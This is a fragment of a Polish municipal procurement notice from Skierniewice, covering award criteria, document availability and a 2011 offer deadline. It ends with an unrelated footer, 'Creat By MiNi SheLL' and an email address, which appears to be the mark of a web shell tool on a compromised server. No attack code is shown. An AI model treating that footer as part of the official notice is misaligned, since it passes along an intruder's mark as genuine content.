<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice
ul. Rynek 1
96-100 Skierniewice
Wydział Inwestycji Kubaturowych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2011 godzina 10:00, miejsce: Urząd Miasta Skierniewice
ul. Rynek 1
96-100 Skierniewice
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com